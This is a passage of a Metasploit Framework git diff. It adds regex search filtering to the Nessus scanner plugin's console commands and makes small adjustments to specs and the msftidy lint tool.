server version.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_properties") + print_status("Example:> nessus_server_properties -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + resp = @n.server_properties tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Feed', 'Type', @@ -392,14 +452,21 @@ module Msf end def cmd_nessus_server_status(*args) - if args[0] == "-h" - print_status("nessus_server_status") - print_status("Example:> nessus_server_status") - print_status() - print_status("Returns some status items for the server..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_server_status") + print_status("Example:> nessus_server_status -S searchterm") + print_status("Returns some status items for the server..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Status', 'Progress' @@ -410,14 +477,17 @@ module Msf end def cmd_nessus_admin(*args) - if args[0] == "-h" - print_status("nessus_admin") - print_status("Example:> nessus_admin") - print_status() - print_status("Checks to see if the current user is an admin") - print_status("Use nessus_user_list to list all users") - return + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_admin") + print_status("Example:> nessus_admin") + print_status("Checks to see if the current user is an admin") + print_status("Use nessus_user_list to list all users") + return + end end + if !nessus_verify_token return end @@ -429,15 +499,21 @@ module Msf end def cmd_nessus_template_list(*args) - if args[0] == "-h" - print_status("nessus_template_list | ") - print_status("Example:> nessus_template_list scan") - print_status("OR") - print_status("nessus_template_list policy") - print_status() - print_status("Returns a list of information about the scan or policy templates..") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_template_list | ") + print_status("Example:> nessus_template_list scan -S searchterm") + print_status("OR") + print_status("nessus_template_list policy") + print_status("Returns a list of information about the scan or policy templates..") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -450,7 +526,6 @@ module Msf print_status("Example:> nessus_template_list scan") print_status("OR") print_status("nessus_template_list policy") - print_status() print_status("Returns a list of information about the scan or policy templates..") return end @@ -465,11 +540,12 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Name', 'Title', 'Description', - 'Subscription Only', + 'Subscription Only', 'Cloud Only' ]) list["templates"].each { |template| @@ -479,12 +555,20 @@ module Msf print_line tbl.to_s end - def cmd_nessus_folder_list + def cmd_nessus_folder_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end list = @n.list_folders tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", @@ -497,7 +581,19 @@ module Msf print_line tbl.to_s end - def cmd_nessus_scanner_list + def cmd_nessus_scanner_list(*args) + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scanner_list") + print_status("Example:> nessus_scanner_list -S searchterm") + print_status("Returns information about the feed type and server version.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end + end if !nessus_verify_token return end @@ -506,6 +602,7 @@ module Msf end list = @n.list_scanners tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "ID", "Name", @@ -520,40 +617,31 @@ module Msf print_line tbl.to_s end - def check_scan(*args) - case args.length - when 1 - scan_id = args[0] - else - print_error("No scan ID supplied") - return - end - scans = @n.scan_list - scans.each { |scan| - if scan["scans"]["id"] == scan_id && scan["scans"]["status"] == "completed" - return true - end - } - return false - end - def cmd_nessus_report_hosts(*args) - if args[0] == "-h" - print_status("nessus_report_hosts ") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_hosts -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id - else + + if scan_id.nil? print_status("Usage: ") - print_status("nessus_report_hosts ") + print_status("nessus_report_hosts -S searchterm") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end + tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -576,22 +664,28 @@ module Msf end def cmd_nessus_report_vulns(*args) - if args[0] == "-h" - print_status("nessus_report_vulns ") - print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") - return + search_term = nil + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_vulns -S searchterm") + print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - case args.length - when 1 - scan_id = args[0] - scan_id = scan_id.to_i - else + if scan_id.nil? print_status("Usage: ") print_status("nessus_report_vulns ") print_status("Use nessus_scan_list to get a list of all the scans. Only completed scans can be reported.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -613,21 +707,29 @@ module Msf end def cmd_nessus_report_host_details(*args) - if args[0] == "-h" - print_status("nessus_report_host_details ") - print_status("Example:> nessus_report_host_details 10 5") - print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") - print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") - return + search_term = nil + search_vuln = nil + scan_id = nil + host_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_details ") + print_status("Example:> nessus_report_host_details 10 5 -S hostinfo -SV vulninfo") + print_status("Use nessus_scan_list to get list of all scans. Only completed scans can be used for reporting.") + print_status("Use nessus_report_hosts to get a list of all the hosts along with their corresponding host IDs.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + when '-SV', '--search-vuln' + search_vuln = /#{args.shift}/nmi + else + scan_id = arg, + host_id = args.shift + end end - if !nessus_verify_token - return - end - case args.length - when 2 - scan_id = args[0] - host_id = args[1] - else + + if [scan_id, host_id].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_detail ") print_status("Example:> nessus_report_host_detail 10 5") @@ -636,6 +738,7 @@ module Msf return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -654,6 +757,7 @@ module Msf } print_line tbl.to_s tbl2 = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_vuln, 'Columns' => [ 'Plugin Name', 'Plugin Famil', @@ -698,27 +802,32 @@ module Msf end def cmd_nessus_report_host_ports(*args) - if args[0] == "-h" - print_status("nessus_report_host_ports ") - print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() - print_status("Returns all the ports associated with a host and details about their vulnerabilities") - print_status("Use nessus_report_hosts to list all available hosts for a report") + search_term = nil + rid = nil + host = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_report_host_ports ") + print_status("Example:> nessus_report_host_ports 192.168.1.250 f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca -S searchterm") + print_status("Returns all the ports associated with a host and details about their vulnerabilities") + print_status("Use nessus_report_hosts to list all available hosts for a report") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 2 - host = args[0] - rid = args[1] - else + + if [host,rid].any?(&:nil?) print_status("Usage: ") print_status("nessus_report_host_ports ") print_status("Use nessus_report_list to list all available reports") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Port', 'Protocol', @@ -744,7 +853,6 @@ module Msf if args[0] == "-h" print_status("nessus_report_del ") print_status("Example:> nessus_report_del f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Must be an admin to del reports.") print_status("Use nessus_report_list to list all reports") return @@ -775,13 +883,19 @@ module Msf end def cmd_nessus_scan_list(*args) - if args[0] == "-h" - print_status("nessus_scan_list") - print_status("Example:> nessus_scan_list") - print_status() - print_status("Returns a list of information about currently running scans.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_scan_list") + print_status("Example:> nessus_scan_list -S searchterm") + print_status("Returns a list of information about currently running scans.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -791,6 +905,7 @@ module Msf return else tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Scan ID', 'Name', @@ -891,7 +1006,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause ") print_status("Example:> nessus_scan_pause f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Pauses a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -919,7 +1033,6 @@ module Msf def cmd_nessus_db_scan(*args) if args[0] == "-h" print_status("nessus_db_scan ") - print_status() print_status("Creates a scan based on all the hosts listed in db_hosts.") print_status("Use nessus_policy_list to list all available policies with their corresponding policy IDs") return @@ -966,7 +1079,6 @@ module Msf if args[0] == "-h" print_status("nessus_db_import ") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if !nessus_verify_db @@ -982,7 +1094,6 @@ module Msf print_status("Usage: ") print_status("nessus_db_import ") print_status("Example:> nessus_db_import 500") - print_status() print_status("Use nessus_scan_list -c to list all completed scans") end if is_scan_complete(scan_id) @@ -1014,18 +1125,6 @@ module Msf else print_error("Only completed scans could be used for import") end - - end - - def is_scan_complete(scan_id) - complete = false - status = @n.scan_list - status["scans"].each { |scan| - if scan["id"] == scan_id.to_i && (scan["status"] == "completed" || scan["status"] == "imported") - complete = true - end - } - complete end def cmd_nessus_scan_pause_all(*args) @@ -1033,7 +1132,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_pause_all") print_status("Example:> nessus_scan_pause_all") - print_status() print_status("Pauses all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1061,7 +1159,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop ") print_status("Example:> nessus_scan_stop f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("Stops a currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1091,7 +1188,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_stop_all") print_status("Example:> nessus_scan_stop_all") - print_status() print_status("stops all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1119,7 +1215,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume ") print_status("Example:> nessus_scan_resume f0eabba3-4065-7d54-5763-f191e98eb0f7f9f33db7e75a06ca") - print_status() print_status("resumes a running scan") print_status("Use nessus_scan_list to list all available scans") return @@ -1149,7 +1244,6 @@ module Msf if args[0] == "-h" print_status("nessus_scan_resume_all") print_status("Example:> nessus_scan_resume_all") - print_status() print_status("resumes all currently running scans") print_status("Use nessus_scan_list to list all running scans") return @@ -1174,35 +1268,39 @@ module Msf end def cmd_nessus_scan_details(*args) - if args[0] == "-h" - print_status("nessus_scan_details ") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return + valid_categories = ['info', 'hosts', 'vulnerabilities', 'history'] + search_term = nil + scan_id = nil + category = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("Usage: ") + print_status("nessus_scan_details -S searchterm") + print_status("Availble categories are info, hosts, vulnerabilities, and history") + print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + scan_id = arg + if args[0].in?(valid_categories) + category = args.shift + else + print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") + return + end + end end + if !nessus_verify_token return end - case args.length - when 2 - scan_id = args[0] - category = args[1] - if category.in?(['info', 'hosts', 'vulnerabilities', 'history']) - category = args[1] - else - print_error("Invalid category. The available categories are info, hosts, vulnerabilities, and history") - return - end - else - print_status("Usage: ") - print_status("nessus_scan_details ") - print_status("Availble categories are info, hosts, vulnerabilities, and history") - print_status("Use nessus_scan_list to list all available scans with their corresponding scan IDs") - return - end + details = @n.scan_details(scan_id) if category == "info" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Status", "Policy", @@ -1214,6 +1312,7 @@ module Msf tbl << [ details["info"]["status"], details["info"]["policy"], details["info"]["name"], details["info"]["targets"], details["info"]["scan_start"], details["info"]["scan_end"] ] elsif category == "hosts" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Host ID", "Hostname", @@ -1227,6 +1326,7 @@ module Msf } elsif category == "vulnerabilities" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "Plugin ID", "Plugin Name", @@ -1238,6 +1338,7 @@ module Msf } elsif category == "history" tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ "History ID", "Status", @@ -1319,27 +1420,31 @@ module Msf end def cmd_nessus_plugin_list(*args) - if args[0] == "-h" - print_status("nessus_plugin_list ") - print_status("Example:> nessus_plugin_list 10") - print_status() - print_status("Returns a list of all plugins in that family.") - print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") - return + search_term = nil + family_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_list -S searchterm") + print_status("Example:> nessus_plugin_list 10") + print_status("Returns a list of all plugins in that family.") + print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + family_id = arg + end end - if !nessus_verify_token - return - end - case args.length - when 1 - family_id = args[0] - else + + if family_id.nil? print_status("Usage: ") print_status("nessus_plugin_list ") print_status("Use nessus_family_list to display all the plugin families along with their corresponding family IDs") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Plugin ID', 'Plugin Name' @@ -1355,21 +1460,28 @@ module Msf end def cmd_nessus_family_list(*args) - if args[0] == "-h" - print_status("nessus_family_list") - print_status("Example:> nessus_family_list") - print_status() - print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_family_list") + print_status("Example:> nessus_family_list -S searchterm") + print_status("Returns a list of all the plugin families along with their corresponding family IDs and plugin count.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + list = @n.list_families tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Family ID', 'Family Name', 'Number of Plugins' ]) - list.each { |family| + list['families'].each { |family| tbl << [ family["id"], family["name"], family["count"] ] } print_line @@ -1377,27 +1489,35 @@ module Msf end def cmd_nessus_plugin_details(*args) - if args[0] == "-h" - print_status("nessus_plugin_details ") - print_status("Example:> nessus_plugin_details 10264") - print_status() - print_status("Returns details on a particular plugin.") - print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") - return + search_term = nil + plugin_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_plugin_details ") + print_status("Example:> nessus_plugin_details 10264 -S searchterm") + print_status("Returns details on a particular plugin.") + print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + else + plugin_id = arg + end end + if !nessus_verify_token return end - case args.length - when 1 - plugin_id = args[0] - else + + if plugin_id.nil? print_status("Usage: ") print_status("nessus_plugin_details ") print_status("Use nessus_plugin_list to list all plugins and their corresponding plugin IDs belonging to a particular plugin family.") return end tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'Reference', 'Value' @@ -1423,13 +1543,19 @@ module Msf end def cmd_nessus_user_list(*args) - if args[0] == "-h" - print_status("nessus_user_list") - print_status("Example:> nessus_user_list") - print_status() - print_status("Returns a list of the users on the Nessus server and their access level.") - return + scan_id = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_user_list") + print_status("Example:> nessus_user_list -S searchterm") + print_status("Returns a list of the users on the Nessus server and their access level.") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -1438,6 +1564,7 @@ module Msf end list=@n.list_users tbl = Rex::Ui::Text::Table.new( + 'SearchTerm' => search_term, 'Columns' => [ 'ID', 'Name', @@ -1493,7 +1620,6 @@ module Msf if args[0] == "-h" print_status("nessus_user_del ") print_status("Example:> nessus_user_del 10") - print_status() print_status("This command can only delete non admin users. You must be an admin to delete users.") print_status("Use nessus_user_list to list all users with their corresponding user IDs") return @@ -1574,13 +1700,19 @@ module Msf end def cmd_nessus_policy_list(*args) - if args[0] == "-h" - print_status("nessus_policy_list") - print_status("Example:> nessus_policy_list") - print_status() - print_status("Lists all policies on the server") - return + search_term = nil + while (arg = args.shift) + case arg + when '-h', '--help' + print_status("nessus_policy_list") + print_status("Example:> nessus_policy_list -S searchterm") + print_status("Lists all policies on the server") + return + when '-S', '--search' + search_term = /#{args.shift}/nmi + end end + if !nessus_verify_token return end @@ -1607,7 +1739,6 @@ module Msf if args[0] == "-h" print_status("nessus_policy_del ") print_status("Example:> nessus_policy_del 1") - print_status() print_status("You must be an admin to delete policies.") print_status("Use nessus_policy_list to list all policies with their corresponding policy IDs") return @@ -1642,31 +1773,6 @@ module Msf print_error("Unknown problem occured by deleting the user account having user ID #{user_id}.") end end - - def valid_policy(*args) - case args.length - when 1 - pid = args[0] - else - print_error("No Policy ID supplied.") - return - end - pol = @n.list_policies - pol["policies"].each { |p| - if p["template_uuid"] == pid - return true - end - } - return false - end - - def nessus_verify_db - if !(framework.db and framework.db.active) - print_error("No database has been configured, please use db_create/db_connect first") - return false - end - true - end end def initialize(framework, opts) diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 3e19e93fa7..d792b31f02 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -323,14 +323,12 @@ RSpec.describe Msf::Exploit::Powershell do end context 'when method is unknown' do - before do - subject.datastore['Powershell::method'] = 'blah' - end it 'should raise an exception' do except = false begin + subject.datastore['Powershell::method'] = 'blah' subject.cmd_psh_payload(payload, arch) - rescue RuntimeError + rescue Msf::OptionValidateError except = true end expect(except).to be_truthy diff --git a/spec/lib/msf/db_manager_spec.rb b/spec/lib/msf/db_manager_spec.rb index 47ee28d2ec..9263da301e 100644 --- a/spec/lib/msf/db_manager_spec.rb +++ b/spec/lib/msf/db_manager_spec.rb @@ -52,5 +52,4 @@ RSpec.describe Msf::DBManager do it { is_expected.to respond_to :error } it { is_expected.to respond_to :initialize_database_support } it { is_expected.to respond_to :service_name_map } - it { is_expected.to respond_to :warn_about_rubies } end diff --git a/tools/dev/msftidy.rb b/tools/dev/msftidy.rb index b4bb2d3b1c..eb294cd2f0 100755 --- a/tools/dev/msftidy.rb +++ b/tools/dev/msftidy.rb @@ -511,7 +511,7 @@ class Msftidy def check_bad_class_name if @source =~ /^\s*class (Metasploit\d+)\s*